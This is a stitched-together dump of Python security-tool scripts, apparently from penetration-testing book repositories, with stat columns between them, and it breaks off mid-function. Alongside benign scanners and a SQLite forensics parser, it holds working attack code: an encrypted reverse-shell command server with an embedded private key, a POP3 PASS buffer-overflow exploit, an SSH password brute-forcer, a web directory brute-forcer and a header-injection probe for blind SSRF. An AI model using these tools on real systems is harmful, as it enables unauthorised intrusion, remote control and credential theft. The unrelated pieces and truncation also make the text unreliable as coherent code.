# For Kali, after extract the tar file, invoke "python setup.py install"
# RSA - Server- TCP Reverse Shell
import socket
from Crypto.PublicKey import RSA
def encrypt(message):
#Remember that here we define the target's public key
publickey ='''-----BEGIN PUBLIC KEY-----
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAms5mJkSBV9C4iPlyxugD
WyaryfJE/e4Z2AvgY9YsNWZasTPQ9gCVoGrfd3I9Efmd2wHJVnBxjL0aenjFV1fa
9hHINMOO0JRQo+2umyg+QMd+EdglA9MWaXUgNb8ADa+zKCT+0VbF92iAlAmAFii6
aY4jkVKSUBVGkmn94WNIYSVzHNSr5JcaPEthRpAAJE2lwjA4OIqpKUDnK/0rzlNl
QkSlBbN7ztEtfzjzI3dJo+i/VsOaS8LHfsk3nKX2GU95AM3LhpF2cMRgIJJCSU2s
B6Hq+TiZFh9bWyceRPjvzJh3LZ2FJUh99kJ28ykIph9XjGMgXZVFmPOFYM7zFKYN
TPgZbO5RCj1LJVJqGlXThJ8PA+7rWwquDgTPMkiH4wP59K2Dz122FYoBDZ8KgP6H
XzcG18q5o/KxONO0whnOSFJQm2XnnbtM8g2DM+x6sYTWf+v75bMAdfNuzBeFNIxA
3FGpzaad+Dv1VNtDW6za5w+tpUjTnUrHyYGsPMo3+hXknhvFL9cmAktlYR+l3qXx
xRK1/zgPexfBTpu7i1qUZilEq5pej/3s0mTtmP7l1MMFU4e7xiBPTzX9QYtvruI5
pDbgT8tFmwhi64wm0mkagNiGDnV1vlHQs6s2rP6lbpvnL7GDOhgwgj1OGV3c13n3
Va82hzcUKsKRb4XKLUvTSaECAwEAAQ==
-----END PUBLIC KEY-----'''
encryptor = RSA.importKey(publickey)
global encriptedData
encriptedData=encryptor.encrypt(message, 0)
return encriptedData[0]
def decrypt(cipher):
#Remember that here we define our (the server's) private key
privatekey = '''-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----'''
decryptor = RSA.importKey(privatekey)
dec = decryptor.decrypt(cipher)
return dec
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("10.10.10.100", 8080))
s.listen(1)
print '[+] Listening for incoming TCP connection on port 8080'
conn, addr = s.accept()
print '[+] We got a connection from: ', addr
while True:
store = ''
command = raw_input("Shell> ")
command = encrypt(command)
if 'terminate' in command:
conn.send('terminate')
conn.close()
break
else:
conn.send(command)
result = conn.recv(512)
if len ( decrypt (result) ) ==512:
store = store + decrypt (result)
result = conn.recv(512)
store = store + decrypt (result)
#If the received output was bigger than 512 bytes (the recv buffer size), then we need to repeat the last two lines
else:
print decrypt (result)
print store
def main ():
connect()
main()
| 40.482993 | 109 | 0.808922 |
owtf | """
GREP Plugin for DoS Failure to Release Resources (OWASP-DS-007)
https://www.owasp.org/index.php/Testing_for_DoS_Failure_to_Release_Resources_%28OWASP-DS-007%29
NOTE: GREP plugins do NOT send traffic to the target and only grep the HTTP Transaction Log
"""
from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Searches transaction DB for timing information"
def run(PluginInfo):
return plugin_helper.FindTopTransactionsBySpeed()
| 33.384615 | 95 | 0.786996 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
buffer=["A"]
counter=100
string="A"*2606 + "\x8f\x35\x4a\x5f" +"C"*390
if 1:
print"Fuzzing PASS with %s bytes" % len(string)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.250.136',110))
data=s.recv(1024)
#print str(data)
s.send('USER root\r\n')
data=s.recv(1024)
print str(data)
s.send('PASS ' + string + '\r\n')
data=s.recv(1024)
print str(data)
print "done"
#s.send('QUIT\r\n')
#s.close()
| 17.551724 | 54 | 0.577281 |
cybersecurity-penetration-testing | import urllib
import urllib2
fields = {
'name' : 'sean',
'password' : 'password!',
'login' : 'LogIn'
}
opener = urllib2.build_opener(
urllib2.HTTPCookieProcessor()
)
request = urllib2.Request(
"http://example.com/login",
urllib.urlencode(fields))
url = opener.open(request)
response = url.read()
url = opener.open("http://example.com/dashboard")
response = url.read()
| 18.166667 | 49 | 0.688953 |
Effective-Python-Penetration-Testing | from Crypto.Cipher import AES
encrypt_AES = AES.new('secret-key-12345', AES.MODE_CBC, 'This is an IV456')
message = "This is message "
ciphertext = encrypt_AES.encrypt(message)
print ciphertext
decrypt_AES = AES.new('secret-key-12345', AES.MODE_CBC, 'This is an IV456')
message_decrypted = decrypt_AES.decrypt(ciphertext)
print message_decrypted
| 37.666667 | 75 | 0.760807 |
cybersecurity-penetration-testing | #!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: nmap_scanner.py
Purpose: To scan a network
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
try:
import nmap
except:
sys.exit("[!] Install the nmap library: pip install python-nmap")
# Argument Validator
if len(sys.argv) != 3:
sys.exit("Please provide two arguments the first being the targets the second the ports")
ports = str(sys.argv[2])
addrs = str(sys.argv[1])
scanner = nmap.PortScanner()
scanner.scan(addrs, ports)
for host in scanner.all_hosts():
if scanner[host].hostname() == "":
    print("The host's IP address is %s and its hostname was not found" % host)
else:
    print("The host's IP address is %s and its hostname is %s" % (host, scanner[host].hostname()))
| 42.627451 | 111 | 0.764838 |
cybersecurity-penetration-testing | import argparse
import binascii
import csv
import logging
import os
import re
import struct
import sys
from collections import namedtuple
from tqdm import trange
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20160401'
__version__ = 0.01
__description__ = '''This script processes SQLite "Write Ahead Logs" and extracts database entries that may
contain deleted records or records that have not yet been added to the main database.'''
def main(wal_file, output_dir, **kwargs):
"""
The main function parses the header of the input file and identifies the WAL file. It then splits the file into
the appropriate frames and sends them for processing. After processing, if applicable, the regular expression
modules are run. Finally, the raw data output is written to a CSV file.
:param wal_file: The filepath to the WAL file to be processed
:param output_dir: The directory to write the CSV report to.
:return: Nothing.
"""
msg = 'Identifying and parsing file header'
print '[+]', msg
logging.info(msg)
wal_attributes = {'size': os.path.getsize(wal_file), 'header': {}, 'frames': {}}
with open(wal_file, 'rb') as wal:
# Parse 32-byte WAL header.
header = wal.read(32)
# If file is less than 32 bytes long: exit wal_crawler.
try:
wal_attributes['header'] = dictHelper(header, '>4s7i', namedtuple('struct',
'magic format pagesize checkpoint '
'salt1 salt2 checksum1 checksum2'))
except struct.error, e:
logging.error('STRUCT ERROR:', e.message)
print '[-]', e.message + '. Exiting..'
sys.exit(2)
# Do not proceed in the program if the input file is not a WAL file.
magic_hex = binascii.hexlify(wal_attributes['header']['magic'])
if magic_hex != "377f0682" and magic_hex != "377f0683":
logging.error('Magic mismatch, expected 0x377f0682 or 0x377f0683 | received {}'.format(magic_hex))
print '[-] File does not have appropriate signature for WAL file. Exiting...'
sys.exit(3)
logging.info('File signature matched.')
logging.info('Processing WAL file.')
# Calculate number of frames.
frames = (wal_attributes['size'] - 32) / (wal_attributes['header']['pagesize'] + 24)
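# Each frame is a 24-byte frame header followed by one database page, so the frame count
# is the file size minus the 32-byte WAL header, divided by (pagesize + 24).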
print '[+] Identified', frames, 'Frames.'
# Parse frames in WAL file. Create progress bar using trange(frames) which is an alias for tqdm(xrange(frames)).
print '[+] Processing frames...'
for x in trange(frames):
# Parse 24-byte WAL frame header.
wal_attributes['frames'][x] = {}
frame_header = wal.read(24)
wal_attributes['frames'][x]['header'] = dictHelper(frame_header, '>6i', namedtuple('struct',
'pagenumber commit salt1'
' salt2 checksum1'
' checksum2'))
# Parse pagesize WAL frame.
frame = wal.read(wal_attributes['header']['pagesize'])
frameParser(wal_attributes, x, frame)
# Run regular expression functions.
if kwargs['m'] or kwargs['r']:
regularSearch(wal_attributes, kwargs)
# Write WAL data to CSV file.
csvWriter(wal_attributes, output_dir)
def frameParser(wal_dict, x, frame):
"""
The frameParser function processes WAL frames.
:param wal_dict: The dictionary containing parsed WAL objects.
:param x: An integer specifying the current frame.
:param frame: The content within the frame read from the WAL file.
:return: Nothing.
"""
# Parse 8-byte WAL page header
page_header = frame[0:8]
wal_dict['frames'][x]['page_header'] = dictHelper(page_header, '>b3hb', namedtuple('struct',
'type freeblocks cells offset'
' fragments'))
# Only want to parse 0x0D B-Tree Leaf Cells
if wal_dict['frames'][x]['page_header']['type'] != 13:
logging.info('Found a non-Leaf Cell in frame {}. Popping frame from dictionary'.format(x))
wal_dict['frames'].pop(x)
return
# Parse offsets for "X" cells
cells = wal_dict['frames'][x]['page_header']['cells']
wal_dict['frames'][x]['cells'] = {}
print '[+] Identified', cells, 'cells in frame', x
print '[+] Processing cells...'
for y in xrange(cells):
start = 8 + (y * 2)
wal_dict['frames'][x]['cells'][y] = {}
wal_dict['frames'][x]['cells'][y] = dictHelper(frame[start: start + 2], '>h', namedtuple('struct', 'offset'))
# Parse cell content
cellParser(wal_dict, x, y, frame)
def cellParser(wal_dict, x, y, frame):
"""
The cellParser function processes WAL cells.
:param wal_dict: The dictionary containing parsed WAL objects.
:param x: An integer specifying the current frame.
:param y: An integer specifying the current cell.
:param frame: The content within the frame read from the WAL file.
:return: Nothing.
"""
index = 0
# Create alias to cell_root to shorten navigating the WAL dictionary structure.
cell_root = wal_dict['frames'][x]['cells'][y]
cell_offset = cell_root['offset']
# Parse the payload length and rowID Varints.
payload_len, index_a = singleVarint(frame[cell_offset:cell_offset + 9])
row_id, index_b = singleVarint(frame[cell_offset + index_a: cell_offset + index_a + 9])
# Update the index. Following the payload length and rowID is the 1-byte header length.
cell_root['payloadlength'] = payload_len
cell_root['rowid'] = row_id
index += index_a + index_b
cell_root['headerlength'] = struct.unpack('>b', frame[cell_offset + index: cell_offset + index + 1])[0]
# Update the index with the 1-byte header length. Next process each Varint in "headerlength" - 1 bytes.
index += 1
types, index_a = multiVarint(frame[cell_offset + index:cell_offset+index+cell_root['headerlength']-1])
cell_root['types'] = types
index += index_a
# Immediately following the end of the Varint headers begins the actual data described by the headers.
# Process them using the typeHelper function.
diff = cell_root['payloadlength'] - cell_root['headerlength']
cell_root['data'] = typeHelper(cell_root['types'], frame[cell_offset + index: cell_offset + index + diff])
def dictHelper(data, format, keys):
"""
The dictHelper function creates an OrderedDictionary from a struct tuple.
:param data: The data to be processed with struct.
:param format: The struct format string.
:param keys: A string of the keys for the values in the struct tuple.
:return: An OrderedDictionary with descriptive keys of struct-parsed values.
"""
return keys._asdict(keys._make(struct.unpack(format, data)))
def singleVarint(data, index=0):
"""
The singleVarint function processes a Varint and returns the length of that Varint.
:param data: The data containing the Varint (maximum of 9 bytes in length as that is the maximum size of a Varint).
:param index: The current index within the data.
:return: varint, the processed varint value,
and index which is used to identify how long the Varint was.
"""
# If the decimal value is >= 128 -- then the first bit is set and we need to process the next byte.
try:
x = ord(data[index:index+1])
except TypeError:
raise TypeError
if x >= 128:
varint = (ord(data[index:index+1]) - 128) * 128 + ord(data[index + 1: index + 2])
index += 2
return varint, index
# If the decimal value is < 128 -- then first bit is not set and is the only byte of the Varint.
else:
varint = ord(data[index:index+1])
index += 1
return varint, index
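# Note: SQLite varints may span up to 9 bytes; singleVarint only decodes the one- and
# two-byte cases, which covers small record headers but not the full 9-byte format.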
def multiVarint(data):
"""
The multiVarint function is similar to the singleVarint function. The difference is that it takes a
range of data and finds all Varints within it.
:param data: The data containing the Varints.
:return: varints, a list containing the processed varint values,
and index which is used to identify how long the Varints were.
"""
varints = []
index = 0
# Loop forever until all Varints are found by repeatedly calling singleVarint.
while len(data) != 0:
varint, index_a = singleVarint(data)
varints.append(varint)
index += index_a
# Shorten data to exclude the most recent Varint.
data = data[index_a:]
return varints, index
def typeHelper(types, data):
"""
The typeHelper function decodes the serial type of the Varints in the WAL file.
:param types: The processed values of the Varints.
:param data: The raw data in the cell that needs to be properly decoded via its varint values.
:return: cell_data, a list of the processed data.
"""
cell_data = []
index = 0
# Value of type dictates how the data should be processed. See serial type table in chapter
# for list of possible values.
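# Serial type reference (SQLite record format): 0 = NULL, 1-6 = big-endian integers of
# 1/2/3/4/6/8 bytes, 7 = 64-bit float, 8/9 = the constants 0 and 1, 10/11 = reserved,
# even N >= 12 = BLOB of (N - 12) / 2 bytes, odd N >= 13 = text of (N - 13) / 2 bytes.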
for type in types:
if type == 0:
cell_data.append('NULL (RowId?)')
elif type == 1:
cell_data.append(struct.unpack('>b', data[index:index + 1])[0])
index += 1
elif type == 2:
cell_data.append(struct.unpack('>h', data[index:index + 2])[0])
index += 2
elif type == 3:
# Struct does not support 24-bit integer
cell_data.append(int(binascii.hexlify(data[index:index + 3]), 16))
index += 3
elif type == 4:
cell_data.append(struct.unpack('>i', data[index:index + 4])[0])
index += 4
elif type == 5:
# Struct does not support 48-bit integer
cell_data.append(int(binascii.hexlify(data[index:index + 6]), 16))
index += 6
elif type == 6:
cell_data.append(struct.unpack('>q', data[index:index + 8])[0])
index += 8
elif type == 7:
cell_data.append(struct.unpack('>d', data[index:index + 8])[0])
index += 8
# Type 8 == Constant 0 and Type 9 == Constant 1. Neither of these take up space in the actual data.
elif type == 8:
cell_data.append(0)
elif type == 9:
cell_data.append(1)
# Types 10 and 11 are reserved and currently not implemented.
elif type > 12 and type % 2 == 0:
b_length = (type - 12) / 2
cell_data.append(data[index:index + b_length])
index += b_length
elif type > 13 and type % 2 == 1:
s_length = (type - 13) / 2
cell_data.append(data[index:index + s_length])
index += s_length
else:
msg = 'Unexpected serial type: {}'.format(type)
print '[-]', msg
logging.error(msg)
return cell_data
def csvWriter(data, output_dir):
"""
The csvWriter function writes frame, cell, and data to a CSV output file.
:param data: The dictionary containing the parsed WAL file.
:param output_dir: The directory to write the CSV report to.
:return: Nothing.
"""
headers = ['Frame', 'Salt-1', 'Salt-2', 'Frame Offset', 'Cell', 'Cell Offset', 'ROWID', 'Data']
with open(os.path.join(output_dir, 'wal_crawler.csv'), 'wb') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(headers)
for frame in data['frames']:
for cell in data['frames'][frame]['cells']:
# Only write entries for cells that have data.
if len(data['frames'][frame]['cells'][cell]['data']) > 0:
# Convert relative frame and cell offsets to file offsets.
frame_offset = 32 + (frame * data['header']['pagesize']) + (frame * 24)
cell_offset = frame_offset + 24 + data['frames'][frame]['cells'][cell]['offset']
# Cell identifiers include the frame #, salt-1, salt-2, frame offset,
# cell #, cell offset, and cell rowID.
cell_identifiers = [frame, data['frames'][frame]['header']['salt1'],
data['frames'][frame]['header']['salt2'],
frame_offset, cell, cell_offset,
data['frames'][frame]['cells'][cell]['rowid']]
# Write the cell_identifiers and actual data within the cell
writer.writerow(cell_identifiers + data['frames'][frame]['cells'][cell]['data'])
else:
continue
csvfile.flush()
csvfile.close()
def regularSearch(data, options):
"""
The regularSearch function performs either default regular expression searches for personal information
or custom searches based on a supplied regular expression string.
:param data: The dictionary containing the parsed WAL file.
:param options: The options dictionary contains custom or pre-determined regular expression searching
:return: Nothing.
"""
msg = 'Initializing regular expression module.'
print '\n{}\n[+]'.format('='*20), msg
logging.info(msg)
if options['r'] and not options['m']:
regexp = {'Custom': options['r']}
else:
# Default regular expression modules include: Credit card numbers, SSNs, Phone numbers, URLs,
# IP Addresses.
regexp = {'Visa Credit Card': r'^4\d{3}([\ \-]?)\d{4}\1\d{4}\1\d{4}$',
'SSN': r'^\d{3}-\d{2}-\d{4}$',
'Phone Number': r'^\d{3}([\ \. \-]?)\d{3}\1\d{4}$',
'URL': r"(http[s]?://)|(www.)(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+",
'IP Address': r'^\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3}$'}
if options['r']:
regexp['Custom'] = options['r']
# Must compile each regular expression before seeing if any data "matches" it.
for exp in regexp.keys():
reg_exp = re.compile(regexp[exp])
for frame in data['frames']:
for cell in data['frames'][frame]['cells']:
for datum in xrange(len(data['frames'][frame]['cells'][cell]['data'])):
# TypeError will occur for non-string objects such as integers.
try:
match = reg_exp.match(data['frames'][frame]['cells'][cell]['data'][datum])
except TypeError:
continue
# Print any successful match to user.
if match:
msg = '{}: {}'.format(exp, data['frames'][frame]['cells'][cell]['data'][datum])
print '[*]', msg
print '='*20
if __name__ == '__main__':
parser = argparse.ArgumentParser(version=str(__version__), description=__description__,
epilog='Developed by ' + __author__ + ' on ' + __date__)
parser.add_argument('WAL', help='SQLite WAL file')
parser.add_argument('OUTPUT_DIR', help='Output Directory')
parser.add_argument('-r', help='Custom regular expression')
parser.add_argument('-m', help='Run regular expression module', action='store_true')
parser.add_argument('-l', help='File path of log file')
args = parser.parse_args()
if args.l:
if not os.path.exists(args.l):
os.makedirs(args.l)
log_path = os.path.join(args.l, 'wal_crawler.log')
else:
log_path = 'wal_crawler.log'
logging.basicConfig(filename=log_path, level=logging.DEBUG,
format='%(asctime)s | %(levelname)s | %(message)s', filemode='a')
logging.info('Starting Wal_Crawler v.' + str(__version__))
logging.debug('System ' + sys.platform)
logging.debug('Version ' + sys.version)
if not os.path.exists(args.OUTPUT_DIR):
os.makedirs(args.OUTPUT_DIR)
if os.path.exists(args.WAL) and os.path.isfile(args.WAL):
main(args.WAL, args.OUTPUT_DIR, r=args.r, m=args.m)
else:
msg = 'Supplied WAL file does not exist or is not a file'
print '[-]', msg
logging.error(msg)
sys.exit(1) | 40.919598 | 120 | 0.578373 |
cybersecurity-penetration-testing | import pxssh
import optparse
import time
from threading import *
maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0
def connect(host, user, password, release):
global Found
global Fails
try:
s = pxssh.pxssh()
s.login(host, user, password)
print '[+] Password Found: ' + password
Found = True
except Exception, e:
if 'read_nonblocking' in str(e):
Fails += 1
time.sleep(5)
connect(host, user, password, False)
elif 'synchronize with original prompt' in str(e):
time.sleep(1)
connect(host, user, password, False)
finally:
if release: connection_lock.release()
def main():
parser = optparse.OptionParser('usage %prog '+\
'-H <target host> -u <user> -F <password list>'
)
parser.add_option('-H', dest='tgtHost', type='string',\
help='specify target host')
parser.add_option('-F', dest='passwdFile', type='string',\
help='specify password file')
parser.add_option('-u', dest='user', type='string',\
help='specify the user')
(options, args) = parser.parse_args()
host = options.tgtHost
passwdFile = options.passwdFile
user = options.user
if host == None or passwdFile == None or user == None:
print parser.usage
exit(0)
fn = open(passwdFile, 'r')
for line in fn.readlines():
if Found:
print "[*] Exiting: Password Found"
exit(0)
if Fails > 5:
print "[!] Exiting: Too Many Socket Timeouts"
exit(0)
connection_lock.acquire()
password = line.strip('\r').strip('\n')
print "[-] Testing: "+str(password)
t = Thread(target=connect, args=(host, user,\
password, True))
child = t.start()
if __name__ == '__main__':
main()
| 24.410959 | 62 | 0.593851 |
cybersecurity-penetration-testing | import urllib2
import urllib
import threading
import Queue
threads = 5
target_url = "http://testphp.vulnweb.com"
wordlist_file = "/tmp/all.txt" # from SVNDigger
resume = None
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
def build_wordlist(wordlist_file):
# read in the word list
fd = open(wordlist_file,"rb")
raw_words = fd.readlines()
fd.close()
found_resume = False
words = Queue.Queue()
for word in raw_words:
word = word.rstrip()
if resume is not None:
if found_resume:
words.put(word)
else:
if word == resume:
found_resume = True
print "Resuming wordlist from: %s" % resume
else:
words.put(word)
return words
def dir_bruter(extensions=None):
while not word_queue.empty():
attempt = word_queue.get()
attempt_list = []
# check if there is a file extension if not
# it's a directory path we're bruting
if "." not in attempt:
attempt_list.append("/%s/" % attempt)
else:
attempt_list.append("/%s" % attempt)
# if we want to bruteforce extensions
if extensions:
for extension in extensions:
attempt_list.append("/%s%s" % (attempt,extension))
# iterate over our list of attempts
for brute in attempt_list:
url = "%s%s" % (target_url,urllib.quote(brute))
try:
headers = {}
headers["User-Agent"] = user_agent
r = urllib2.Request(url,headers=headers)
response = urllib2.urlopen(r)
if len(response.read()):
print "[%d] => %s" % (response.code,url)
except urllib2.HTTPError,e:
if e.code != 404:
print "!!! %d => %s" % (e.code,url)
pass
word_queue = build_wordlist(wordlist_file)
extensions = [".php",".bak",".orig",".inc"]
for i in range(threads):
t = threading.Thread(target=dir_bruter,args=(extensions,))
t.start() | 26.617978 | 87 | 0.476597 |
cybersecurity-penetration-testing | #!/usr/bin/python3
import re
import sys
import json
import string
import random
import datetime
import socket
import ssl
import requests
import functools
from urllib.parse import urljoin, urlparse
from threading import Lock
from Database import Database
from threading import Thread
from time import sleep
from mitmproxy import http, ctx
VERSION = '0.1'
# Must point to JSON file containing configuration mentioned in `config` dictionary below.
# One can either supply that configuration file, or let the below variable empty and fill the `config`
# dictionary instead.
CONFIGURATION_FILE = 'config.json'
config = {
'debug' : False,
# The server hostname where affected systems shall pingback.
'pingback-host': '',
'server-remote-addr': '',
'mysql-host': '',
'mysql-user': '',
'mysql-pass': '',
'mysql-database': '',
}
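# Illustrative sketch (not part of the original project) of what the JSON file
# referenced by CONFIGURATION_FILE could contain; the keys mirror the `config`
# dictionary above and every value below is a hypothetical placeholder.
#
# {
#     "debug": false,
#     "pingback-host": "pingback.example.com",
#     "server-remote-addr": "203.0.113.10",
#     "mysql-host": "127.0.0.1",
#     "mysql-user": "collaborator",
#     "mysql-pass": "changeme",
#     "mysql-database": "collaborator"
# }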
append_headers = (
'X-Forwarded-For',
'Referer',
'True-Client-IP',
'X-Originating-IP',
'X-Client-IP',
'Client-IP',
'X-Real-IP',
'Contact',
'Forwarded',
'CF-Connecting_IP',
'X-WAP-Profile'
)
visited_hosts = set()
add_host_lock = Lock()
database_lock = Lock()
CONNECTION_TIMEOUT = 4.0
CHUNK_SIZE = 512
def generateRandomId():
randomized = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(50))
return "xxx" + randomized + "yyy"
# note that this decorator ignores **kwargs
def memoize(obj):
cache = obj.cache = {}
@functools.wraps(obj)
def memoizer(*args, **kwargs):
if args not in cache:
cache[args] = obj(*args, **kwargs)
return cache[args]
return memoizer
def dbg(x):
if 'debug' in config.keys() and config['debug']:
print('[dbg] ' + x)
class SendRawHttpRequest:
def __init__(self):
self.sock = None
def connect(self, host, port, _ssl, timeout):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if _ssl:
context = ssl.create_default_context()
context.check_hostname = False
context.options |= ssl.OP_ALL
context.verify_mode = ssl.CERT_NONE
self.sock = context.wrap_socket(sock)
else:
self.sock = sock
self.sock.settimeout(timeout)
